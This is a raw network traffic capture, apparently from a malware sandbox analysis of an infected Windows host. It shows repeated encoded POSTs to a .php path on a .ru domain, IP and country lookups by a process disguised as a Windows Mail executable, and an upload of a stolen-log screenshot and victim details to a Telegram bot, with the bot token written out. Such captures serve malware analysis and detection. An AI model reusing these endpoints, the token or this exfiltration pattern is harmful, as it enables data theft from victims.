                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:21.861352921 CET1060OUTData Raw: 5f 5f 5d 5f 5f 5f 5d 57 5c 5f 50 57 54 50 59 52 59 55 5b 5c 57 50 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __]___]W\_PWTPYRYU[\WPTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&3 _($^ !3&3=%[)?4.3R?6!+R*;.^''P*1
                                                                                                                                Jan 11, 2025 15:04:21.974008083 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:22.233005047 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UGyWS1FGRV95dRX1M4Epy4okYQ2NdpZxG63S2yTH8AvS5c1LjQRWYUSUU5rbI558Mtaj7ECXwJhZi6cjP566dD9l9bTCW%2FEjKJ4jbKSW%2BLYMg1SmGHyI2psnuIMpDjKQiTL%2F5cct"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005749d0dc50c78-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3698&min_rtt=1704&rtt_var=4628&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=82663&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                144192.168.2.550126104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:22.373133898 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:22.720613003 CET1060OUTData Raw: 5f 57 58 59 5f 5c 58 53 5c 5f 50 57 54 53 59 5f 59 51 5b 5a 57 5f 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _WXY_\XS\_PWTSY_YQ[ZW_T_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X& <<!1%&%;*92*,Q49>%/(%<5'=+.^''P*=
                                                                                                                                Jan 11, 2025 15:04:22.818943977 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:23.063617945 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74jKLkHAlJfa4d%2BJ96CsXZd2Y0BEW5HocP%2FDOnq9auhxailFhNR%2BjUYZyTl1PmO17AS7bqMHHeyvggCyMCzptU8Kwl27Bwvk1XQlCZpZq4gvpTnkI2ZbRklc7GhJMoLDXx7TFweg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574a25e9632e2-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4899&min_rtt=1926&rtt_var=6669&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=56776&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                145192.168.2.550127104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:22.382720947 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:22.736290932 CET1776OUTData Raw: 5f 5f 58 5a 5a 5f 58 55 5c 5f 50 57 54 50 59 5c 59 53 5b 5a 57 5f 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __XZZ_XU\_PWTPY\YS[ZW_TP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2,<!771&$50_)95++(Q#6V3+5; 48=+.^''P*1
                                                                                                                                Jan 11, 2025 15:04:22.854475021 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                146192.168.2.550128104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:23.194597006 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:23.550141096 CET1060OUTData Raw: 5a 52 58 5f 5a 5f 5d 50 5c 5f 50 57 54 5d 59 5d 59 52 5b 5c 57 56 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZRX_Z_]P\_PWT]Y]YR[\WVT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_%7?' $6'*99)8P79S3?:(&'"#*.^''P*
                                                                                                                                Jan 11, 2025 15:04:23.648233891 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:23.818351984 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DzcWDY4cvSHDQB74947KFB3DXBY7Gb7a1DMnJBb%2FiuhJXjGDO9ky3V5yR9ZH%2BH2k7jm10tDuMnOt56GzgB9LcGvH0Cb3Cq4MIzj5RkSvQN13WXGWgoHrGLe6ilMkzjUNKdHxRidv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574a7884342bc-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6704&min_rtt=1683&rtt_var=10674&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=34882&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                147192.168.2.550129104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:24.067610025 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:24.423737049 CET1060OUTData Raw: 5f 57 5d 55 5f 53 58 52 5c 5f 50 57 54 56 59 5e 59 55 5b 5a 57 5e 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _W]U_SXR\_PWTVY^YU[ZW^T^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"20_(24 !&^'60_=*&>+W#96S'/:S(& 4<>.^''P*)
                                                                                                                                Jan 11, 2025 15:04:24.522919893 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:24.769491911 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:24 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2LAs7tPWFZ3vTJFWIYgdhWZcCWOsYRk9f2VF3CPjTSbjCtBNnF1qhhklDV%2B8ucg98j9NgzRa2DBGl7V9ImmKDGctGqLDTuFU9MTvMuQc1Jqiu%2BvjuymtTSB3914BWAx31GepLqzb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574acfcecc44a-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2987&min_rtt=1469&rtt_var=3587&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=107250&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                148192.168.2.550130104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:24.906136990 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:04:25.252022982 CET1060OUTData Raw: 5f 54 58 5d 5f 52 5d 57 5c 5f 50 57 54 52 59 53 59 53 5b 5a 57 52 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _TX]_R]W\_PWTRYSYS[ZWRT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!10^(T$7"^$4]=%]*(/#!'&(6+*;.^''P*
                                                                                                                                Jan 11, 2025 15:04:25.379616976 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:25.562834024 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:25 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trFB19X6UkNVHVuOJn4ftwSmJ3bxwnHkq4FQuRu71VhPYiuloJtM%2Fo94uJHavEljOLSw09qBdy93n8yvsS1wEi7O5vaPLUIK5ZZ%2F77UC5lBobbYmfPMWEt86eQn4uXCjC3ivbsqC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574b25c138cc6-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=12727&min_rtt=7946&rtt_var=12543&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=31602&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                149192.168.2.550131104.21.38.8480
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:04:25.698458910 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:04:26.048686028 CET1060OUTData Raw: 5f 55 58 59 5f 53 58 50 5c 5f 50 57 54 5d 59 52 59 56 5b 5b 57 5f 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _UXY_SXP\_PWT]YRYV[[W_T^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"20?T \#&\'C4_))U490?V(5$"7#W=;.^''P*
                                                                                                                                Jan 11, 2025 15:04:26.216408968 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:26.485291004 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eNRYWYRIFN0sQGP9kV1AEbX3%2Fp2xoJ1XgP%2BRKQQ9b0vp1cQ5MD85HhfYCrTsFFhOI1jMkhgeQgI%2Fbk7AwynVKIg96E7o0RSStGnIg%2B8kmZ0GnNyi7Ug%2B69kjtvA5Iy4kITc47pX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574b78fca8c69-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=9572&min_rtt=6601&rtt_var=8419&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=48064&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.54994734.117.59.814435436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2025-01-11 14:03:03 UTC61OUTGET /ip HTTP/1.1
                                                                                                                                Host: ipinfo.io
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2025-01-11 14:03:03 UTC305INHTTP/1.1 200 OK
                                                                                                                                date: Sat, 11 Jan 2025 14:03:02 GMT
                                                                                                                                content-type: text/plain; charset=utf-8
                                                                                                                                Content-Length: 12
                                                                                                                                access-control-allow-origin: *
                                                                                                                                via: 1.1 google
                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
                                                                                                                                2025-01-11 14:03:03 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                Data Ascii: 8.46.123.189


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.54995534.117.59.814435436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2025-01-11 14:03:04 UTC42OUTGET /country HTTP/1.1
                                                                                                                                Host: ipinfo.io
                                                                                                                                2025-01-11 14:03:04 UTC448INHTTP/1.1 200 OK
                                                                                                                                access-control-allow-origin: *
                                                                                                                                Content-Length: 3
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                date: Sat, 11 Jan 2025 14:03:04 GMT
                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                via: 1.1 google
                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
                                                                                                                                2025-01-11 14:03:04 UTC3INData Raw: 55 53 0a
                                                                                                                                Data Ascii: US


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.549963149.154.167.2204435436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2025-01-11 14:03:05 UTC256OUTPOST /bot8039401524:AAFcWGDQGg-hS6lbQGiVB_qWg821-l6LJqk/sendPhoto HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary="46d320d3-5b85-4524-9efd-7dcb6d562ef6"
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 104711
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2025-01-11 14:03:05 UTC40OUTData Raw: 2d 2d 34 36 64 33 32 30 64 33 2d 35 62 38 35 2d 34 35 32 34 2d 39 65 66 64 2d 37 64 63 62 36 64 35 36 32 65 66 36 0d 0a
                                                                                                                                Data Ascii: --46d320d3-5b85-4524-9efd-7dcb6d562ef6
                                                                                                                                2025-01-11 14:03:05 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                                Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                                2025-01-11 14:03:05 UTC10OUTData Raw: 36 36 33 33 39 39 34 35 34 36
                                                                                                                                Data Ascii: 6633994546
                                                                                                                                2025-01-11 14:03:05 UTC131OUTData Raw: 0d 0a 2d 2d 34 36 64 33 32 30 64 33 2d 35 62 38 35 2d 34 35 32 34 2d 39 65 66 64 2d 37 64 63 62 36 64 35 36 32 65 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                                Data Ascii: --46d320d3-5b85-4524-9efd-7dcb6d562ef6Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                                2025-01-11 14:03:05 UTC143OUTData Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 39 37 63 63 38 34 62 32 61 30 65 64 37 62 61 38 35 35 63 63 32 32 38 30 39 37 30 37 64 66 64 30 38 39 64 39 66 30 35 64 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 55 73 65 72 6e 61 6d 65 3a 20 61 6c 66 6f 6e 73 0a 50 43 20 4e 61 6d 65 3a 20 37 36 30 36 33 39 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a 47 45 4f 3a 20 55 53 0a 0a 4c 6f 67 20 73 69 7a 65 3a 20 39 38 32 35 34
                                                                                                                                Data Ascii: Log collectedID: 97cc84b2a0ed7ba855cc22809707dfd089d9f05dComment: Username: userPC Name: 760639IP: 8.46.123.189GEO: USLog size: 98254
                                                                                                                                2025-01-11 14:03:05 UTC146OUTData Raw: 0d 0a 2d 2d 34 36 64 33 32 30 64 33 2d 35 62 38 35 2d 34 35 32 34 2d 39 65 66 64 2d 37 64 63 62 36 64 35 36 32 65 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                                Data Ascii: --46d320d3-5b85-4524-9efd-7dcb6d562ef6Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                                2025-01-11 14:03:05 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                                2025-01-11 14:03:05 UTC4096OUTData Raw: 21 cf ad 25 3b 91 48 47 f9 cd 03 1b 4a 68 fe 94 9d a8 18 7e 34 77 a3 fc e2 83 8a 00 4a 4c 73 8e b4 ee d4 9d a9 8c 43 d3 14 11 cd 1d 87 5a 28 18 98 cf 4a 00 a0 81 46 0e 3d 68 01 0d 1f a5 18 f6 a0 f5 a4 30 1d 69 33 4b fd 69 28 01 0d 19 a2 83 de 81 88 7a 51 f8 52 f7 e6 93 3f 5a 60 14 51 9c 51 9f a5 00 26 73 e9 4a 79 f6 c7 bd 21 eb 46 69 0c 07 5c fe 94 71 f9 d1 9e 28 c5 03 0f c2 9b 4e ed fe 34 9f 85 30 0a 41 ef 4a 45 20 e3 da 90 05 1f e7 34 0e b4 50 30 34 94 bd 8d 03 9a 00 69 a5 cf 3d 30 4d 1d fa d2 67 19 fe 94 c0 0f 4a 38 cd 14 75 cd 21 86 3a d0 73 9c 7e b4 62 8f c2 98 08 39 38 eb 4a 68 ff 00 3c 52 03 fe 73 40 01 e7 ff 00 d5 46 69 4f 5e 3f 3a 43 f9 52 18 74 a3 ad 14 9f ca 98 ce f2 8a 64 d2 ac 30 b4 8d f7 54 64 d4 d7 d1 c7 62 d7 0a 6f 2d 27 6b 5b 85 b6 b9 58
                                                                                                                                Data Ascii: !%;HGJh~4wJLsCZ(JF=h0i3Ki(zQR?Z`QQ&sJy!Fi\q(N40AJE 4P04i=0MgJ8u!:s~b98Jh<Rs@FiO^?:CRtd0Tdbo-'k[X
